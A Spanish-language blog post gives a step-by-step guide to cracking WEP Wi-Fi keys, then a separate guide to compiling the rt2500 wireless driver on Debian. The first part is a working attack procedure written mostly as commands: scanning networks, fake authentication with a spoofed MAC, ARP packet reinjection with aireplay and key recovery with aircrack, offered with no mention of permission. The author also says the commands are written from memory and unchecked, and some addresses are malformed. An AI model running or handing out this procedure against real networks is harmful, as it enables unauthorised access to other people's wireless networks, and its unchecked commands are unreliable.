[Como] Seguridad inalámbrica: WEP
Hay ya varios manuales, pero ahí va una mini guía:
-Descargar Troppix1.2. Esta livecd ya tiene los controladores para esta tarjeta (y la mayoría de ellas, sólo que para algunas sería recomendable tener las últimas versiones.. Por ejemplo para las atheros). Quemar el cd y obviamente arrancar el equipo con él.
-Luego sería más o menos así:
Código:
iwlist ra0 scan
Código:
Cell 01 - Address: 00:03:C9:BB:CC::DD Mode:Managed ESSID:"Essid1" Encryption ***:on Channel:11 Quality:0/100 Signal level:-62 dBm Noise level:-202 dBm Cell 02 - Address: 00:03:C9:EE:FF:11 Mode:Managed ESSID:"Essid2" Encryption ***:on Channel:6 Quality:0/100 Signal level:-71 dBm Noise level:-193 dBm
Código:
airodump ra0 captura1 11
Código:
iwconfig ra0 rate 1
Código:
aireplay -1 0 -e Essid1 -a 00:03:C9:BB:CC::DD -h 55:44:33:22:11:00 ra0
Ahora, y si no recibimos paquetes de deautenticación, estamos asociados al AP. O mejor dicho está la MAC 00:03:C9:BB:CC:D asociada al AP
Necesitaremos aproximadamente un mínimo de un millón de paquetes encriptados para poder averiguar la clave WEP que se está utilizando para cifrar la comunicación. Si pretendemos capturar este volumen de datos de forma pasiva (sólo "oyendo") pues hay que esperar sentados. Y mucho tiempo por cierto. Es por ello por lo que se usa la reinyección.
La reinyección consiste en básicamente capturar un paquete ARP para modificarlo ligeramente y enviárselo al AP. Éste, aunque fuera para mandarnos a hacer gárgaras, nos responde con un paquete también cifrado, pero con un nuevo vector de inicialización. Estos vectores de inicialización diferentes son justo lo que necesitamos.
Si en el comando que escribimos anteriormente para ejecutar airodump escribiésemos un '1' al final, entonces le estaríamos diciendo que sólo capturase los vectores de inicialización (de aquí en adelante IVs), en lugar de los paquetes difrados completos. El comando quedaría así:
Código:
airodump ra0 captura1 11 1
Código:
aireplay -3 -b 00:03:C9:BB:CC::DD -h 55:44:33:22:11:00 ra0
Cuando ésta se produzcan veremos como el valor de #data comienza a subir rápidamente. Todos esos paquetes quedarán almacenados en el archivo de captura que airodump ha creado al iniciarse. Pero ojo, se perderán si reiniciamos, ya que estamos trabajando con una livecd. Hay dos soluciones alternativas: Usar un linux instalada al disco duro (recomiendo ésta por supuesto) o guardar la captura en algún tipo de medio.
Una vez tenemos ese ansiado millón de paquetes podemos probar a lanzar aircrack sobre él para ver si nos da la clave.
Desde el mismo directorio donde lanzamos la captura:
Código:
aircrack *.cap
Troppix 1.2:
http://tinyurl.com/rp9fu (Pobierz para descargar)
Cómo instalar el módulo para nuestra tarjeta inalámbrica en linux (debian)
En esta guía explicaré cómo instalar el módulo encargado de controlar una tarjeta inalámbrica con chipset rt2500.
Para poder añadir módulos a nuestro sistema debemos tener instaladas en éste bien las fuente o bien los headers del kernel que estemos usando.
En debian es bastante sencillo, ya que el mismo comando averiguará la versión del kernel que estamos usando y nos instalará los headers adecuados:
Código:
apt-get install kernel-headers-$(uname -r)
Código:
apt-get install build-essential
Para esta guía usaré: rt2500 PCI/PCMCIA nightly CVS tarball: rt2500-CVS. Las diferentes versiones de este driver las podéis encontrar en http://rt2x00.serialmonkey.com/wiki/index.php/Downloads
Bien, vamos al lío.
Antes de nada, por cuestiones personales de organización l o que yo hago es cambiar a un directorio donde poder operar sin líos innecesarios:
Código:
cd /usr
Código:
su
Código:
wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
Código:
ls
Código:
tar -xvzf rt2500-cvs-daily.tar.gz
Código:
cd rt*
Código:
cd Module;make
Código:
make install
Código:
modprobe rt2500
Código:
ifconfig -a
* Este manual lo hago de memoria, ya que ahora mismo no me encuentro ante un linux en que comprobar los comandos y demás, sino ante mi nuevo OpenBSD (si no lo digo exploto )
Fuente: http://hackhispano.com
Fuente: http://hackhispano.com
Saludos / SiriusHack
0 Response for the "[Como] Seguridad inalámbrica: WEP (Crackear WEP)"
Publicar un comentario